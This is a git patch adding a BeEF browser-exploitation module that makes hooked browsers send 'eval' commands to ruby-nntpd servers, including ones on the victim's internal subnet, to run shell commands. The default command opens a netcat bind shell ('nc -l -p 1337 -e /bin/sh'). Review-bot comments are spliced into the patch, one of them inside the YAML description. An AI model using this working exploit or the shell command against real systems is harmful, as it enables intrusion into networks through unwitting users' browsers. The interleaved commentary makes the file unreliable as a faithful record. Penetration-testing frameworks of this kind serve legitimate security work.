From 717f63ff0cc974e1f1a73463dd77ef1eac387fc5 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Fri, 24 May 2013 13:50:04 +0930
Subject: [PATCH] Add ruby-nntpd Command Execution exploit module
---
.../exploits/ruby_nntpd_cmd_exec/command.js | 43 +++++++++++++++++++
.../exploits/ruby_nntpd_cmd_exec/config.yaml | 16 +++++++
.../exploits/ruby_nntpd_cmd_exec/module.rb | 24 +++++++++++
3 files changed, 83 insertions(+)
create mode 100644 modules/exploits/ruby_nntpd_cmd_exec/command.js
create mode 100644 modules/exploits/ruby_nntpd_cmd_exec/config.yaml
create mode 100644 modules/exploits/ruby_nntpd_cmd_exec/module.rb
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/command.js b/modules/exploits/ruby_nntpd_cmd_exec/command.js
new file mode 100644
index 000000000..8ac6f5de6
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var timeout = '<%= @timeout %>';
+
+ // validate payload
+ try {
+ var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+ var payload = '\r\neval `'+cmd+'`\r\nexit\r\n';
+ } catch(e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+ return;
+ }
+
+ // validate target details
+ if (!rport || !rhost || isNaN(rport)) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+ return;
+ }
+ if (rport > 65535 || rport < 0) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+ return;
+ }
+
+ // send commands
+ var nntpd_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, payload);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(nntpd_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/config.yaml b/modules/exploits/ruby_nntpd_cmd_exec/config.yaml
new file mode 100644
index 000000000..09abcc5d0
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ ruby_nntpd_cmd_exec:
+ enable: true
+ category: "Exploits"
+ name: "ruby-nntpd Command Execution"
+ description: "This module uses the 'eval' verb in ruby-nntpd 0.01dev (default port 1119) to execute operating system commands.
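Review bot: The cleanup at the end of the `beef.execute` callback assigns `cleanup` without `var`, making it a page-global, and `setTimeout("cleanup()", ...)` looks that global up by name only when the timer fires; if the module is run a second time inside the timeout window, the second run overwrites `cleanup` before the first timer fires, the first `nntpd_iframe_<id>` is never removed and the second `removeChild` throws on an already-detached node. Binding the iframe in a closure avoids the shared global: `setTimeout(function() { document.body.removeChild(nntpd_iframe_<%= @command_id %>); }, timeout*1000);`. `timeout` is also the one option that is never validated: it is interpolated as a string and then multiplied, so a non-numeric value gives `NaN` and the iframe is torn down immediately; a guard next to the port check, `if (isNaN(timeout) || timeout < 0) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid timeout'); return; }`, would cover it. Note too that the `try`/`catch` around the `cmd` literal can only catch runtime errors, so if the template expansion ever yields invalid JavaScript the failure happens at parse time outside the try and the `'fail=malformed payload'` branch is not reached for that case.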

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF."
+ authors: ["bcoles"]
+ target:
+ working: ["FF", "C"]
+ not_working: ["IE"]
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/module.rb b/modules/exploits/ruby_nntpd_cmd_exec/module.rb
new file mode 100644
index 000000000..660076af3
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# ruby-nntpd homepage: http://code.google.com/p/ruby-nntpd/
+###
+class Ruby_nntpd_cmd_exec < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+ {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '1119'},
+ {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+ {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'nc -l -p 1337 -e /bin/sh', 'width'=>'200px' },
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+ save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
+ end
+
+end
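Review bot: `post_execute` in module.rb writes both `save` lines as `... if not @datastore[...].nil?`, a double negative that Ruby spells with `unless`: `save({'result' => @datastore['result']}) unless @datastore['result'].nil?` and `save({'fail' => @datastore['fail']}) unless @datastore['fail'].nil?`. In the same file `self.options` uses an explicit `return [` where the array literal is already the last expression, and the hashes mix `'name'=>'rhost'` with `'ui_label' => ...` spacing, which RuboCop will flag. The two datastore keys are undocumented; a comment above `post_execute` such as `# command.js posts back either 'result=...' or 'fail=...'; persist whichever key arrived` would tell a maintainer where they originate. It is also worth a comment on `rport` and `timeout` that their only validation is the client-side check in command.js, since the Ruby side accepts any string for them.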